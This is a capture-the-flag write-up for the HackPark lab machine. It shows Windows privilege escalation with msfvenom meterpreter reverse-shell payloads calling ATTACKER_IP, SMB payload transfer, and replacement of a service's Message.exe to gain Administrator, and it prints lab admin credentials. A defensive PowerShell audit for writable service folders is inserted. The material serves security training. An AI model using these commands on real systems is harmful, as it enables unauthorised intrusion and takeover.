HackPark
MSFVENOM
- Generating the payload with msfvenom. Afterwards we upload it to the BlogEngine host through an SMB server, using our netcat session.
    msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=ATTACKER_IP LPORT=PORT -f exe -o Rev_Shell.exe
SMB
- Using a Python SMB server to transfer files to the target machine.
    attacker@machine:~$ smbserver LINUXSHARE /mnt/SMBShare
- In the netcat session we go to the Temp directory and download the reverse shell from our SMB server.
    C:\Windows\system32\inetsrv> cd "C:\Windows\Temp"
    C:\Windows\Temp> copy \\10.10.169.216\LINUXSHARE\Rev_Shell.exe Rev_Shell.exe
- After that we can execute our reverse shell.
    C:\Windows\Temp> .\Rev_Shell.exe
Metasploit
- Catching our reverse shell with Metasploit.
- Using: exploit/multi/handler
- PAYLOAD: windows/meterpreter/reverse_tcp
    [*] Started reverse TCP handler on 10.10.20.30:5555
    [*] Sending stage (175686 bytes) to 10.10.76.79
    [*] Meterpreter session 1 opened (10.10.20.30:5555 -> 10.10.76.79:49225) at 2022-10-10 06:29:06 +0200
- We are logged in as: IIS APPPOOL\Blog
    meterpreter > getuid
    Server username: IIS APPPOOL\Blog
    meterpreter > sysinfo
    Computer        : HACKPARK
    OS              : Windows 2012 R2 (6.3 Build 9600).
    Architecture    : x64
    System Language : en_US
    Domain          : WORKGROUP
    Logged On Users : 1
    Meterpreter     : x86/windows
    meterpreter > shell
Enumeration
- Enumerating with WinPEAS we find an unusual service on the system, WService.exe [System Scheduler]. We have write permissions on the folder of the service.
    WindowsScheduler(Splinterware Software Solutions - System Scheduler Service)[C:\PROGRA~2\SYSTEM~1\WService.exe] - Auto - Running
    File Permissions: Everyone [WriteData/CreateFiles]
    Possible DLL Hijacking in binary folder: "C:\Program Files (x86)\SystemScheduler" (Everyone [WriteDataCreateFiles])
    System Scheduler Service Wrapper
- There is an unusual running process, Message.exe, that belongs to System Scheduler. We can replace Message.exe with a reverse shell to gain higher permissions on the machine.
    C:\Windows\Temp> tasklist /v
    Image Name      PID    Session Name   Session   Mem Usage
    =============== ====== ============== ========= ==========
    [..]
    Message.exe     2472                  1         7,180 K
    [..]
    C:\Windows\Temp> where /r C:\ Message.exe
    File Location: 'C:\Program Files (x86)\SystemScheduler\Message.exe'
    C:\Windows\Temp> cd "C:\Program Files (x86)\SystemScheduler"
    C:\Program Files (x86)\SystemScheduler> dir
    [..]
    10/09/2022  09:30 PM    <DIR>          Events
    03/25/2018  10:58 AM           536,992 Message.exe
    [..]
- From the logs we can see that Message.exe is running with Administrator privileges.
    C:\Program Files (x86)\SystemScheduler> cd Events
    C:\Program Files (x86)\SystemScheduler\Events> dir
    10/09/2022  09:31 PM            19,321 20198415519.INI_LOG.txt
    C:\Program Files (x86)\SystemScheduler\Events> type 20198415519.INI_LOG.txt
    08/04/19 15:06:01,Event Started Ok, (Administrator)
    08/04/19 15:06:30,Process Ended. PID:2608,ExitCode:1,Message.exe (Administrator)
PAYLOAD
- Generating the payload that will replace Message.exe.
    msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=ATTACKER_IP LPORT=PORT -f exe -o Message.exe
- Once again we transfer the payload to the target machine using the Python SMB server.
    C:\Program Files (x86)\SystemScheduler\Events> cd ..
    C:\Program Files (x86)\SystemScheduler> copy \\10.10.20.30\LINUXSHARE\Message.exe Message.exe
    Overwrite Message.exe? (Yes/No/All): Yes
            1 file(s) copied.
Exploitation
- Using: exploit/multi/handler
- PAYLOAD: windows/meterpreter/reverse_tcp
- After replacing the Message.exe binary we get a reverse shell after a few seconds.
    [*] Started reverse TCP handler on 10.10.20.30:7777
    [*] Sending stage (175686 bytes) to 10.10.76.79
    [*] Meterpreter session 1 opened (10.10.20.30:7777 -> 10.10.76.79:49237) at 2022-10-10 06:36:13 +0200
- We have Administrator rights: HACKPARK\Administrator
    meterpreter > getuid
    Server username: HACKPARK\Administrator
    meterpreter > sysinfo
    Computer        : HACKPARK
    OS              : Windows 2012 R2 (6.3 Build 9600).
    Architecture    : x64
    System Language : en_US
    Domain          : WORKGROUP
    Logged On Users : 1
    Meterpreter     : x86/windows
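The escalation above works only because the service's binary folder grants Everyone write/create rights. As an added example (not from the original write-up), this PowerShell audit reproduces that WinPEAS check across all installed services; the list of broad principals and the rights mask are my assumptions.

```powershell
# Added example, not part of the original write-up: flag services whose binary
# folder grants write/create rights to broad principals. This is the weakness
# WinPEAS reported above (Everyone: WriteData/CreateFiles on the SystemScheduler
# folder), which let IIS APPPOOL\Blog swap Message.exe for a payload.
$BroadPrincipals = @(                      # assumption: principals treated as "anyone"
    'Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users',
    'NT AUTHORITY\INTERACTIVE', 'BUILTIN\IIS_IUSRS'
)
# Rights that allow planting or replacing a file inside the folder.
$WriteMask = [System.Security.AccessControl.FileSystemRights]'WriteData, AppendData, Modify, FullControl'

function Get-ServiceBinaryFolder {
    param([string]$PathName)
    if ([string]::IsNullOrWhiteSpace($PathName)) { return $null }
    # Quoted path: take the quoted part; unquoted: take the first token ending in .exe
    if ($PathName -match '^\s*"([^"]+)"')       { $exe = $Matches[1] }
    elseif ($PathName -match '^\s*(\S+?\.exe)') { $exe = $Matches[1] }
    else                                        { $exe = ($PathName -split '\s+')[0] }
    return Split-Path -Path $exe -Parent
}

function Find-WritableServiceFolders {
    Get-CimInstance -ClassName Win32_Service | ForEach-Object {
        $svc = $_
        $dir = Get-ServiceBinaryFolder -PathName $svc.PathName
        if (-not $dir -or -not (Test-Path -LiteralPath $dir)) { return }
        $acl = Get-Acl -LiteralPath $dir
        foreach ($ace in $acl.Access) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            if ($BroadPrincipals -notcontains $ace.IdentityReference.Value) { continue }
            if (($ace.FileSystemRights -band $WriteMask) -eq 0) { continue }
            [pscustomobject]@{
                Service   = $svc.Name
                StartMode = $svc.StartMode
                RunAs     = $svc.StartName      # LocalSystem/Administrator here = full compromise
                Folder    = $dir
                Principal = $ace.IdentityReference.Value
                Rights    = $ace.FileSystemRights
            }
        }
    }
}

Find-WritableServiceFolders | Format-Table -AutoSize
# Remediation for a hit like the one above (run elevated), dropping the broad grant:
#   icacls "C:\Program Files (x86)\SystemScheduler" /remove:g Everyone
```

Folders under Program Files normally inherit read/execute only, so any row this prints is worth a ticket; pair it with file-integrity monitoring on the flagged folders to catch a replaced binary like Message.exe.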
OTHER [WinPEAS]
- Found default Administrator credentials during enumeration with WinPEAS.
- The credentials can be used to access the machine over RDP (Remote Desktop Protocol).
    DefaultUserName : administrator
    DefaultPassword : 4q6XvFES7Fdxs